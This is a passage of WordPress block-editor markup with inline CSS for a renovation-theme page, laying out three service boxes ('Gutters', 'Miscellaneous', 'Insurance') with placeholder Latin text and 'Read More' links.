255, 255, 0) 100%); }\n .block-abb180d8-6220-4fbd-8b13-9b1a01abc33b .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-abb180d8-6220-4fbd-8b13-9b1a01abc33b .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-abb180d8-6220-4fbd-8b13-9b1a01abc33b .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-abb180d8-6220-4fbd-8b13-9b1a01abc33b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-abb180d8-6220-4fbd-8b13-9b1a01abc33b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-abb180d8-6220-4fbd-8b13-9b1a01abc33b skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-3\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"1dbb8474-65d4-483c-84d0-b75c10b9a9a0\",\"blockBorderRadius\":5,\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-1dbb8474-65d4-483c-84d0-b75c10b9a9a0 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-1dbb8474-65d4-483c-84d0-b75c10b9a9a0 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-1dbb8474-65d4-483c-84d0-b75c10b9a9a0 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-1dbb8474-65d4-483c-84d0-b75c10b9a9a0 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-1dbb8474-65d4-483c-84d0-b75c10b9a9a0 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-1dbb8474-65d4-483c-84d0-b75c10b9a9a0\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadingTag\":\"h4\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/floor-modification/\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"uploading\":false,\"date\":\"2021-05-28T05:39:15.000Z\",\"filename\":\"floor-modification.jpg\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"jpeg\",\"alt\":\"\",\"title\":\"floor-modification\",\"caption\":\"\",\"description\":\"\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\",\"id\":258,\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/home/floor-modification/\",\"author\":\"1\",\"name\":\"floor-modification\",\"status\":\"inherit\",\"modified\":\"2021-05-28T05:39:15.000Z\",\"mime\":\"image/jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 28, 2021\",\"nonces\":{\"update\":\"dc1b7f19b6\",\"delete\":\"1f29bf8951\",\"edit\":\"ed86f5af8b\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=258u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":9306,\"filesizeHumanReadable\":\"9 KB\",\"context\":\"\",\"height\":66,\"width\":111,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\",\"height\":66,\"width\":111,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":111,\"resshowPrefix\":false,\"counterId\":\"5d2675a4-fe64-46db-a12e-a5099cf66e81\"} -->\n<style type=\"text/css\"> .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-image-content img {\n width: 111px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h4 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Gutters</h4></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis.<br>Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/floor-modification/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#333;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#333\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"673b41df-9cb3-42e4-aa60-44dea2983a99\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-673b41df-9cb3-42e4-aa60-44dea2983a99 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-673b41df-9cb3-42e4-aa60-44dea2983a99 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-673b41df-9cb3-42e4-aa60-44dea2983a99 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-673b41df-9cb3-42e4-aa60-44dea2983a99 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-673b41df-9cb3-42e4-aa60-44dea2983a99 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-673b41df-9cb3-42e4-aa60-44dea2983a99\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/remodeling/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":27,\"title\":\"services-img1\",\"filename\":\"services-img1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"598bfdc22b\",\"delete\":\"5d1b940541\",\"edit\":\"0a4d84ebf2\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=27u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":3709,\"filesizeHumanReadable\":\"4 KB\",\"context\":\"\",\"height\":65,\"width\":65,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\",\"height\":65,\"width\":65,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":65,\"resshowPrefix\":false,\"counterId\":\"877dac13-99c6-40a9-9dd5-6fca441a57f3\"} -->\n<style type=\"text/css\"> .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-image-content img {\n width: 65px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\"><strong>Miscellaneous</strong></h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/remodeling/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"blockId\":\"b6bfc812-3413-49c0-a306-0ead7dc25f71\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-b6bfc812-3413-49c0-a306-0ead7dc25f71 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-b6bfc812-3413-49c0-a306-0ead7dc25f71 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-b6bfc812-3413-49c0-a306-0ead7dc25f71 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-b6bfc812-3413-49c0-a306-0ead7dc25f71 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-b6bfc812-3413-49c0-a306-0ead7dc25f71 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-b6bfc812-3413-49c0-a306-0ead7dc25f71\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/plumbing/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":30,\"title\":\"services-img4\",\"filename\":\"services-img4.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"632a5a602a\",\"delete\":\"eed2430960\",\"edit\":\"f2d09a400a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=30u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":2845,\"filesizeHumanReadable\":\"3 KB\",\"context\":\"\",\"height\":66,\"width\":57,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\",\"height\":66,\"width\":57,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":57,\"resshowPrefix\":false,\"counterId\":\"0246a0b4-b038-4227-bbfb-f2e04361b8d2\"} -->\n<style type=\"text/css\"> .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-image-content img {\n width: 57px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Insurance</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/plumbing/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section 